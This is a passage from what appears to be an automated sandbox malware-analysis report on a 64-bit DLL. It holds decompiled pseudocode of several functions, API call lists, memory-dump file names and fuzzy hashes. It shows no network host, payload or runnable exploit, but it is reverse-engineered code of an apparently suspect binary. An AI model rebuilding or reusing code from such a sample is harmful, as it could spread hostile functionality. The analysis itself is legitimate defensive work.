                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 2523292596-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
